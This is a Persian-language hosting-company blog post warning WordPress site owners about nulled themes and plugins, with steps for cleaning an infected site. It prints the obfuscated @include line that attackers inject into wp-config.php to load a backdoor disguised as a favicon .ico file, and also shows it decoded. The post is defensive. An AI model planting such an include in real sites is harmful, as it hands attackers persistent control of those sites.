1

  • +98-9365693023
  • arminhc@yahoo.co.uk
    • Farsi
    • English
  • عضویت
  • پنل کاربری
وان سرور Menu   ≡ ╳
  • صفحه اصلی
  • سرور مجازی
    • سرور مجازی آمریکا
    • سرور مجازی فرانسه OVH
    • سرور مجازی آلمان
    • سرور مجازی هلند
    • سرور مجازی حرفه ای Nvme
    • سرور مجازی انگلیس ( آنی )
  • سرور اختصاصی
    • فروش سرور اختصاصی آمریکا
    • فروش سرور اختصاصی هلند
  • هاستینگ و دامنه
    • هاست استاندارد ارزان
    • هاست پر سرعت NVMe
    • هاست قدرتمند شرکتی NVMe
    • هاست رسیلری
    • ثبت آنلاین دامنه
  • خدمات اینستا
    • افزایش فالوور نامحدود
    • فالوور،لایک و بازدید
    • فروش پیج
    • ربات هوشمند جذب فالوور
  • جزیره آموزشی
  • درباره ما
    • تماس با ما
    • قوانین کلی سایت وان سرور
    • نماد اعتماد

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

  • 12/12/2017
  • 0 Comments

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
– چند مدیریت برای خویش فعال می کنند
– با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنن:

@include  "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl  \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";

اولین نفری باشید که از آموزشها و تخفیفهای ویژه با خبر میشوید 😉
با عضویت در خبرنامه از 80 درصد تخفیف بهره مند شوید

که دیکد آن چنین می شود:

@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند …..

حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی

  • previous post
  • Next post

Leave a Comment لغو پاسخ

با عضویت در خبرنامه از 80 درصد تخفیف بهره مند شوید


Search


Recent Posts

۵ ترفند برای بازاریابی اینترنتی
21/02/2019
آموزش کانفیگ فایروال با UFW در اوبونتو 18.04
20/02/2019
آموزش غیرفعال کردن فایروال در اوبنتو 18.04
19/02/2019
آموزش نصب Iptables در CentOS 7
18/02/2019
آموزش غیرفعال کردن فایروال در CentOS 7
16/02/2019

دسته‌ها

  • آموزش سئو و بهینه سازی
  • آموزش کنترل پنل ها
  • آموزش نرم افزارهای اکانتینگ
  • آموزش های سرورمجازی لینوکس
  • آموزش های سرورمجازی میکروتیک
  • آموزش های سرورمجازی ویندوز
  • آموزش های نرم افزارها
  • آموزش های هاست
  • اخبارهای ویژه
  • دانلود سنتر
  • دسته‌بندی نشده

0

15000

محاسبه گر قیمت:
قیمت یورو: 15,000
درگاه پرداخت
درگاه پرداخت
نماد اعتماد
نماد اعتماد
دسترسی سریع
  • قوانین سایت
  • سوالات متداول
  • نمایندگی
  • درخواست پشتیبانی
  • پنل کاربران
  • تماس با ما
  • سرورهای مجازی
  • سرور مجازی آمریکا
  • سرور مجازی فرانسه
  • سرور مجازی آلمان
  • سرور مجازی هلند
  • سرور مجازی NVMe
  • سرور مجازی ارزان
  • دسته بندی جزیره
    • آموزش سئو و بهینه سازی
    • آموزش کنترل پنل ها
    • آموزش نرم افزارهای اکانتینگ
    • آموزش های سرورمجازی لینوکس
    • آموزش های سرورمجازی میکروتیک
    • آموزش های سرورمجازی ویندوز
    • آموزش های نرم افزارها
    • آموزش های هاست
    • اخبارهای ویژه
    • دانلود سنتر
    • دسته‌بندی نشده
    Copyright © 2011-2019 one3erver.com. All Rights Reserved